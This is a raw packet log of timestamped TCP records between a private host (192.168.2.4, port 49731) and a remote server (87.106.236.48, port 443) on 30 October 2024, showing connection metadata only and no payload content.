Oct 30, 2024 19:47:19.085669041 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.085819960 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.085833073 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.085861921 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.085896015 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.085901022 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.085977077 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.091289043 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.091306925 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.091363907 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.091371059 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.091409922 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.091653109 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.091666937 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.091711998 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.091718912 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.091761112 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.091984987 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.091999054 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.092051983 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.092058897 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.092171907 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.122313976 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.122329950 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.122395992 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.122421980 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.122467041 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.123383045 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.123397112 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.123454094 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.123462915 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.123505116 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.207930088 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.207956076 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.208003998 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.208029032 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.208053112 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.208076954 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.208265066 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.208280087 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.208321095 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.208328009 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.208353043 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.208373070 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.208683968 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.208699942 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.208749056 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.208756924 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.208798885 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.209295988 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.209312916 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.209366083 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.209372044 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.209398985 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.209413052 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.209420919 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.209438086 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.209451914 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.209481955 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.210062027 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.210076094 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.210129023 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.210136890 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.210174084 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.210233927 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.210247993 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.210295916 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.210303068 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.210341930 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.211066961 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.211085081 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.211137056 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.211142063 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.211153030 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.211188078 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.211194038 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.211205006 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.211236954 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.211889982 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.211903095 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.211958885 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.211966038 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.212004900 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.212152004 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.212169886 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.212208986 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.212210894 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.212219954 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.212248087 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.212263107 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.212270975 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.212296009 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.212310076 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.213051081 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.213064909 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.213113070 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.213119984 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.213129044 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.213155031 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.213157892 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.213166952 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.213185072 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.213215113 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.213998079 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.214014053 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.214062929 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.214070082 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.214103937 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.214468002 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.214483023 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.214531898 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.214540005 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.214576006 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.214853048 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.214868069 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.214916945 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.214924097 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.214960098 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.215177059 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.215193987 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.215225935 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.215231895 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.215240955 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.215717077 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.215735912 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.215781927 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.215789080 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.215825081 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.246184111 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.246197939 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.246395111 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.246417999 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.246468067 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.289232016 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.289252996 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.289526939 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.289536953 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.289750099 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.327244043 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.327258110 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.327331066 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.327339888 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.327398062 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.328114986 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.328129053 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.328188896 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.328197002 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.328237057 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.328543901 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.328560114 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.328608990 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.328615904 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.328655005 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.328964949 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.328979969 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.329025030 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.329030991 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.329078913 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.332000017 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.332015991 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.332086086 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.332093000 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.332130909 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.332556963 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.332572937 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.332623959 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.332629919 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.332665920 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.332775116 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.332792997 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.332823992 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.332830906 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.332856894 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.332869053 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.333045959 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.333061934 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.333096027 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.333102942 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.333127022 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.333146095 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.333386898 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.333401918 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.333445072 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.333450079 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.333486080 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.333688974 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.333703995 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.333739996 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.333745003 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.333766937 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.333782911 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.334038019 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.334053993 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.334086895 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.334094048 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.334115028 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.334132910 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.334367990 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.334384918 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.334433079 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.334439993 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.334482908 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.334708929 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.334722996 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.334759951 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.334765911 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.334790945 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.334800005 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.335058928 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.335074902 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.335108995 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.335114002 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.335150957 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.335164070 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.335403919 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.335421085 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.335481882 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.335525036 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.335530043 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.335664988 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.335766077 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.335782051 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.335817099 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.335824013 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.335851908 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.335870981 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.339061975 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.339077950 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.339133024 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.339140892 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.339169025 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.339179993 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.339402914 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.339417934 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.339453936 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.339462042 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.339478970 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.339502096 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.339708090 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.339720964 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.339777946 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.339783907 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.339807034 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.339826107 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.369350910 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.369371891 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.369436979 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.369446993 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.369486094 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.370131016 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.370146990 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.370182991 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.370196104 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.370212078 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.370230913 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.413503885 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.413518906 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.413584948 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.413595915 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.413635015 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.451278925 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.451296091 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.451473951 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.451498032 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.451550007 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.453000069 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.453013897 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.453068972 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.453077078 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.453119040 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.453319073 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.453332901 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.453383923 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.453394890 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.453435898 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.454684019 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.454699993 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.454754114 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.454761028 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.454794884 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.455049992 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.455064058 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.455111980 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.455118895 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.455164909 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.455674887 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.455691099 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.455741882 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.455748081 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.455789089 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.456031084 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.456047058 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.456096888 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.456104040 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.456146002 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.457037926 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.457053900 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.457107067 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.457113981 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.457150936 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.457343102 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.457364082 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.457398891 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.457406044 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.457428932 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.457442045 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.457715988 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.457731009 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.457777023 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.457784891 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.457825899 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.458067894 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.458084106 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.458136082 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.458143950 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.458180904 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.458349943 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.458364964 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.458410025 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.458416939 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.458457947 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.458641052 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.458657980 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.458700895 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.458708048 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.458748102 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.459081888 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.459095955 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.459151030 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.459157944 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.459196091 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.459332943 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.459347010 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.459397078 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.459403038 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.459443092 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.459702015 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.459717989 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.459762096 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.459768057 CET	443	49731	87.106.236.48	192.168.2.4
